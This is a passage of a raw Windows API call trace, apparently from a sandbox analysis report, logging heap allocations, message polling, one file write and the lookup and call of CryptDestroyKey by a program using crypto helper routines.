(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0221.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0221.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0221.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0221.849] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0221.849] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0221.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0221.849] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0221.849] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0221.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0221.850] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.850] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0221.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040e0 [0221.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0221.850] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0221.850] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0221.850] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.850] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.850] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0221.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0221.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0221.850] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0221.858] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0221.859] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.859] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0221.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0221.859] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.860] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f24820*, nNumberOfBytesToWrite=0xca28, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24820*, lpNumberOfBytesWritten=0x8cf5e4*=0xca28, lpOverlapped=0x0) returned 1 [0221.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0221.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0221.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0221.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0221.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0221.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0221.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0221.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0221.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0221.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0221.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0221.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0221.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0221.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0221.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0221.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0221.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0221.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0221.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0221.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0221.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0221.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0221.944] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0221.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0221.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55038 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0221.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0221.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0221.944] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0221.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0221.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0221.945] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0221.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0221.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0221.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0221.946] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0221.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0221.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0221.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0221.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0221.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0221.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0221.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0221.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0221.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0221.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0221.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0221.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0221.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0221.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0221.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0221.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0221.946] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0221.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0221.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0221.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0221.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0221.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0221.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0221.947] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0221.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0221.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0221.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0221.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0221.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0221.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0221.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0221.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0221.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0221.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0221.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0221.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0221.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0221.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0221.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0221.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0221.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0221.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0221.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0221.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e511f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0221.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0221.948] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0221.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0221.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0221.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0221.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0221.949] CryptDestroyKey (hKey=0xa87250) returned 1 [0221.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0221.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0221.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0221.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0221.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0221.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0221.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0221.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0221.949] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0221.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0221.949] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0221.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0221.963] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0221.964] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.964] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0221.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0221.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0221.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0221.965] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0221.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0221.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0221.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0221.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0221.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0221.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0221.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0221.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0221.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0221.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0221.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0221.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0221.965] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0221.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0221.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0221.966] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0221.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0221.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0221.966] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0221.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0221.966] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0221.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e30 [0221.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0221.966] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0221.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0221.966] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0221.966] CharUpperBuffW 